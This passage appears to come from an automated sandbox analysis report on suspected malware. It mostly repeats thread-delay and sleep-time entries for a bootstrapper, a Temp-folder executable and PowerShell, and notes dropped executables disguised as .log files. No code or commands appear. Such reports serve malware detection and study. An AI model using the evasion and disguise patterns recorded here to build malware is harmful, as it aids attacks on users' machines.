                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 595329
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594954
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594709
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 594110
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 593735
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 593464
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 592922
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 592657
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 592344
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 591969
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 591625
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 591172
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 590547
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 300000
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 590276
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 590016
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 589625
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 589219
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 588766
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 588406
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 587860
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 587516
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 586985
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 586594
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 586047
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 585657
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584922
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584438
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584256
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 584089
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583958
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583822
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583699
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583554
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583393
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583250
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 583125
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582995
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582868
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582764
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582654
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582532
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582375
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582238
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 582094
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581971
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581831
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581704
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581578
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581425
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581297
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 581113
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580579
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580374
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580266
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580154
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 580039
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579875
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579719
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579485
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579345
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579204
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 579094
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 578969
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeThread delayed: delay time: 578840
                                    Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeWindow / User API: threadDelayed 7479Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exeWindow / User API: threadDelayed 2375Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1485
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1582
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1227
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1266
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1065
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1750
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1447
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2021
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1241
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1294
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1048
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1013
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1289
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1999
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1145
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2542
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1367
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1337
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeWindow / User API: threadDelayed 9416
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeDropped PE file which has not been started: C:\Users\user\Desktop\QWdDhtsw.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeDropped PE file which has not been started: C:\Users\user\Desktop\wLNGnQCR.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeDropped PE file which has not been started: C:\Users\user\Desktop\FtgWXsHz.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeDropped PE file which has not been started: C:\Users\user\Desktop\qHDXlZnr.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeDropped PE file which has not been started: C:\Users\user\Desktop\nFQoPqiw.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeDropped PE file which has not been started: C:\Users\user\Desktop\gjQRaIsv.logJump to dropped file
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exeDropped PE file which has not been started: C:\Users\user\Desktop\VMFLzOzY.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeDropped PE file which has not been started: C:\Users\user\Desktop\GnKnxRmO.logJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -600000s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599890s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599780s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599671s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599562s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599453s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599343s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599234s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599125s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -599015s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598906s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598796s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598686s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598578s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598468s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598233s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598125s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -598015s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597906s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597796s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597687s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597578s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597468s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597359s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597249s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597140s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -597031s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596921s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596812s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596703s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596593s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596484s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596375s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596265s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596156s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -596046s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595929s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595780s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595671s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595562s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595453s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595343s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595234s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595125s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -595015s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -594906s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -594796s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -594687s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -594578s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe TID: 4040Thread sleep time: -594468s >= -30000sJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe TID: 2212Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 1485 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8724Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8460Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep count: 1582 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8360Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7600Thread sleep count: 1227 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8700Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8452Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 1266 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8764Thread sleep time: -7378697629483816s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8412Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 1065 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8436Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7812Thread sleep count: 1750 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8784Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8444Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816Thread sleep count: 1447 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8780Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8424Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7904Thread sleep count: 2021 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8732Thread sleep time: -7378697629483816s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8404Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996Thread sleep count: 1241 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8748Thread sleep time: -5534023222112862s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8500Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep count: 1294 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8772Thread sleep time: -4611686018427385s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8604Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5184Thread sleep count: 1048 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8760Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8516Thread sleep time: -1844674407370954s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep count: 1013 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8752Thread sleep time: -17524406870024063s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8372Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8188Thread sleep count: 1289 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8704Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8492Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8180Thread sleep count: 1999 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8708Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8472Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7220Thread sleep count: 1145 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8736Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1880Thread sleep count: 2542 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8712Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8484Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8232Thread sleep count: 1367 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8808Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8220Thread sleep count: 1337 > 30
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8716Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe TID: 2088Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe TID: 1664Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 4444Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 5696Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 5632Thread sleep time: -30000s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -13835058055282155s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -600000s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -599860s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -599454s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -598797s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -598516s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -597922s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -597547s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 2708Thread sleep time: -28800000s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -597047s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -596547s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -596157s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -595532s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -595329s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -594954s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -594709s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -594547s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -594110s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -593735s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -593464s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -592922s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -592657s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -592344s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -591969s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -591625s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -591172s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -590547s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 2708Thread sleep time: -300000s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -590276s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -590016s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -589625s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -589219s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -588766s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -588406s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -587860s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -587516s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -586985s >= -30000s
                                    Source: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe TID: 9120Thread sleep time: -586594s >= -30000s
